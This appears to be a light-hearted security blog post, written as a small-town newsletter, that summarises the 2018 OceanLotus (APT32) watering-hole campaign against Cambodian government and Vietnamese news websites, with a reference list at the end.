Woesnotgone Meadow; December 2, 2018

Woesnotgone Meadow
December 2, 2018

All is relatively well here at Woesnotgone Meadow, where everyone has above average bandwidth. This time of year the air begins to become a bit chilly as the reason starts to change from fall to winter, as the dogs bring the mud into the house. In Woesnotgone Meadow, our watering hole is Maggie’s on Main Street. This is the only watering hole in the meadow, however, in Southeast Asia, it happens another watering hole has surfaced. This, however, is not as pleasant.

This latest issue was discovered by ESET researchers. This was a new watering hole campaign, termed OceanLotus, using several websites. This has also been termed APT32 and APT-C-OO in certain circles. The geographic focus of this malware has been users and websites in Southeast Asia and has been in operation since September 2018. From all appearances, this seems to be well planned.

Differentiation
The watering hole attack protocol is not new to the environment or industry. One aspect which makes this unique is a large number of compromised websites, at least 21, involved with this attack. On a secondary level, this is also unique due to the handful of compromised websites being a high profile (e.g. Ministry of Defense of Cambodia, Ministry of Foreign Affairs, and International Cooperation of Cambodia).

Also, curiously this also targeted several Vietnamese newspapers and blog websites. These attackers usually focus on websites their targets regularly visit. This attack however focussed on websites visited by many people.

Evolving Attack
As noted, this is not a fresh attack format. This began operating in 2014 with the OceanLotus Advanced Persistent Threat (APT) group. This specific attack appears to have begun as OceanLotus Framework B in 2017, with updates creating the latest version. This includes using public key cryptography to exchange an AES session key. This indicates improved communication, and to prevent any security products from intercepting the payload.

Stealth
On the range of complexity with attacks, this is not on the basic end of the spectrum. To produce this more complex attack, the attackers for the compromised websites used a first and second stage process.

Responsible Reporting
This was noted by the researchers and they did notify the compromised websites in October 2018. This was not however fixed until late October 2018.

Attack
The attack process for this is relatively straightforward. The person visits the compromised site. The users are tricked into installing a fake installer or updater for commonly used software. The attackers at this point added a small amount of JavaScript on the index page or in the alternative the JavaScript file hosted on the same server. The code then loads a new script from a server controlled by the attackers.

Thanks for visiting Woesnotgone Meadow, where the encryption is strong, and the O/Ss are always using the latest version.



Resources
Abel, R. (2018, November 20). Watering the ocean lotus: New watering hole attacks target southeast asia. Retrieved from https://www.scmagazine.com/home/security-news/for-the-last-few-months-the-threat-group-oceanlotus-also-knwon-as-apt32-and-apt-c-00-has-been-carrying-out-a-watering-hole-campaign-targetting-

Arghire, I. (2018, March 3). “OceanLotus” spies use new backdoor in recent attacks. Retrieved from https://www.securityweek.com/oceanlotus-spies-use-new-backdoor-recent-attacks

AlienVault. (2018, November 21). OceanLotus new watering hole attack in southeast asia. Retrieved from https://otx.alienvault.com/pulse/

Mitre Corporation. (n.d.). APT32. Retrieved from https://attack.mitre.org/groups/G0050/